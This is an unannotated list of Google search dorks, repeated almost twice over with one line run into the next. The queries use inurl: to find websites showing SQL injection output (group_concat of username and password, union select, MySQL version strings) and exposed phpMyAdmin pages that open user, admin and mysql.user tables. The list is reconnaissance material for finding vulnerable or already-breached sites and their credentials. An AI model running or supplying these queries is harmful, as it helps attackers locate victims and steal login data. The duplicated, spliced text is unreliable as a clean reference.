inurl:group_concat username 0x3a PASSWORD from adm
inurl:group_concat username 0x3a PASSWORD from admin
inurl:group_concat username 0x3a PASSWORD from user
inurl:concat username 0x3a password from sysibm.sysdummy1
inurl:concat username 0x3a password from israel
inurl:concat username 0x3a password from mr.bean
inurl:concat username 0x3a password from sysuser
inurl:concat username 0x3a password from sysadmin
inurl:/MyBB/Upload/inc/
inurl:db_mysql.php
inurl:sql.php?table=wp_users
inurl:sql.php?table=group
inurl:sql.php?table=phpMyAdmin
inurl:sql.php?table=users
inurl:sql.php?table=login
inurl:/phpMyAdmin/sql.php
inurl:sql.php?table=customer
inurl:sql.php?table=member
inurl:sql.php?table=account
inurl:sql.php?table=admin
inurl:sql.php?table=tblwhoislog
inurl:/usr/local/apache/htdocs
inurl:sql.php?table=jos_users
inurl:sql.php?table=mybb_users
inurl:sql.php?table=log
inurl:sql.php?table=pass
inurl:sql.php?table=information_schema
inurl:sql.php?table=proxies_priv
inurl:sql.php?table=mysql.user
inurl:sql.php?table=collection
inurl:sql.php?table=loginlog
inurl:sql.php?table=menu
inurl:sql.php?table=setting
inurl:sql.php?table=phpbb_users
inurl:/phpmyadmin/sql.php?db=mysql&sql_query=
inurl:union+select+filetype:asp
inurl:union+select+filetype:php
inurl:union+select+filetype:cfm
inurl:union 4.1.22-standard-log
inurl:union 5.0.67-log
inurl:union» 4.1.22-log
inurl:union 5.0.32
inurl:union» 5.0.67
inurl:union» 5.0.51a-3ubuntu5
inurl:union» 5.1.63-cll
inurl:bootstrap.php
inurl:Host:+filetype:sql
inurl:phpMyAdmin running on localhost – phpMyAdmin 2.5.7-pl1inurl:group_concat username 0x3a PASSWORD from robot
inurl:group_concat username 0x3a PASSWORD from pirates
inurl:group_concat username 0x3a PASSWORD from obama
inurl:group_concat username 0x3a PASSWORD from shadow
inurl:group_concat username 0x3a PASSWORD from khan
inurl:group_concat username 0x3a PASSWORD from paul
inurl:group_concat username 0x3a PASSWORD from pakistan
inurl:group_concat username 0x3a PASSWORD from hacker
inurl:group_concat username 0x3a PASSWORD from users
inurl:group_concat username 0x3a PASSWORD from adm
inurl:group_concat username 0x3a PASSWORD from admin
inurl:group_concat username 0x3a PASSWORD from user
inurl:concat username 0x3a password from sysibm.sysdummy1
inurl:concat username 0x3a password from israel
inurl:concat username 0x3a password from mr.bean
inurl:concat username 0x3a password from sysuser
inurl:concat username 0x3a password from sysadmin
inurl:/MyBB/Upload/inc/
inurl:db_mysql.php
inurl:sql.php?table=wp_users
inurl:sql.php?table=group
inurl:sql.php?table=phpMyAdmin
inurl:sql.php?table=users
inurl:sql.php?table=login
inurl:/phpMyAdmin/sql.php
inurl:sql.php?table=customer
inurl:sql.php?table=member
inurl:sql.php?table=account
inurl:sql.php?table=admin
inurl:sql.php?table=tblwhoislog
inurl:/usr/local/apache/htdocs
inurl:sql.php?table=jos_users
inurl:sql.php?table=mybb_users
inurl:sql.php?table=log
inurl:sql.php?table=pass
inurl:sql.php?table=information_schema
inurl:sql.php?table=proxies_priv
inurl:sql.php?table=mysql.user
inurl:sql.php?table=collection
inurl:sql.php?table=loginlog
inurl:sql.php?table=menu
inurl:sql.php?table=setting
inurl:sql.php?table=phpbb_users
inurl:/phpmyadmin/sql.php?db=mysql&sql_query=
inurl:union+select+filetype:asp
inurl:union+select+filetype:php
inurl:union+select+filetype:cfm
inurl:union 4.1.22-standard-log
inurl:union 5.0.67-log
inurl:union» 4.1.22-log
inurl:union 5.0.32
inurl:union» 5.0.67
inurl:union» 5.0.51a-3ubuntu5
inurl:union» 5.1.63-cll
inurl:bootstrap.php
inurl:Host:+filetype:sql
inurl:phpMyAdmin running on localhost – phpMyAdmin 2.5.7-pl1